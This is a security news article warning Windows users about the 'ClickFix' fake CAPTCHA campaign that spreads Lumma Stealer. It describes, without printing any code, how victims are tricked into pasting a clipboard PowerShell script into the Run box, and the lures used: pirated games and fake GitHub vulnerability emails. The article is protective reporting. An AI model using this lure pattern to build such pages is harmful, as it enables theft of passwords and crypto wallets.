A new warning as we head into the weekend, that a “global attack” is now targeting Windows users in multiple countries around the world. The campaign is stupidly simple, but it hammers home the risk for the hundreds of millions of Windows 10 users heading for a world without security updates a year from now.
Last month, Palo Alto Networks’ Unit 42 flagged the risk from fake new CAPTCHAs, albeit it generated little attention at the time, albeit a video posted on X by researcher John Hammond helped raise awareness. Now the researchers at McAfee have issued a new warning about these fake CAPTCHA popups now doing the rounds.
These attacks should be easy to spot—but they’re designed to be casually effective. The fake challenges are designed to distribute Lumma Stealer. “These pages have a button that, when clicked, shows instructions for victims to paste PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware. The associated Lumma Stealer EXE files retrieve and use zip archives that don’t appear to be inherently malicious on their own.”
In its new report, McAfee now warns that “the ClickFix infection chain operates by deceiving users into clicking on buttons like Verify you are a human’ or ‘I am not a robot.’ Once clicked, a malicious script is copied to the user’s clipboard. Users are then misled into pasting the script after pressing the Windows key + R, unknowingly executing the malware. This method of trickery facilitates the infection process, making it easy for attackers to deploy malware.”
You get the pattern. The infostealing malware that will be planted on your PC will target your account details and passwords as well as crypto wallets. It doesn’t look like a normal CAPTCHA, albeit those are evolving making it harder to be certain. Even so, when you’re copying and pasting, if alarm bells aren’t ringing in your head at that point, turn off your PC and maybe take a break.
McAfee highlights two deviously crafted lures—targeting those looking to download illegally pirated games and software developers worried there might be a security issue with code they have written and released.
Users surfing online for illegal copies of games likely have their guards raised in any case, when doing so, the team says, “they may encounter online forums, community posts, or public repositories that redirect them to malicious links.”
The second target group is even more devious. “Users receive phishing emails, often targeting GitHub contributors, urging them to address a fake ‘security vulnerability.’ These emails contain links leading to the same fake CAPTCHA pages.”
Hudson Rock’s Infostealers website reported on the same types of attacks early this month, but again this didn’t receive the pickup it deserved. “As of late August 2024,” the researchers warned, “attackers have been using fraudulent ‘human verification’ pages to trick users into executing a malicious PowerShell script.”
“The ClickFix infection chain,” McAfee now says, “demonstrates how cybercriminals exploit common user behaviors—such as downloading cracked software and responding to phishing emails—to distribute malware like Lumma Stealer. By leveraging fake CAPTCHA pages, attackers deceive users into executing malicious scripts that bypass detection, ultimately leading to malware installation.”
This fake CAPTCHA attack is now becoming a thing—be wary and take a moment when challenged to check for any signs of compromise. It won’t always be as obvious as we are seeing here. Such attacks will evolve and become harder to spot. Certainly, you should never, ever cut and paste and execute from within a CAPTCHA.
Meanwhile, this is yet another timely warning for Windows 10 users that whatever they do between now and October next year, falling off support should not be one of them. If Microsoft doesn’t provide sensibly priced extension options and workarounds don’t fully plug the gap, you’ll need to make the move to Windows 11.
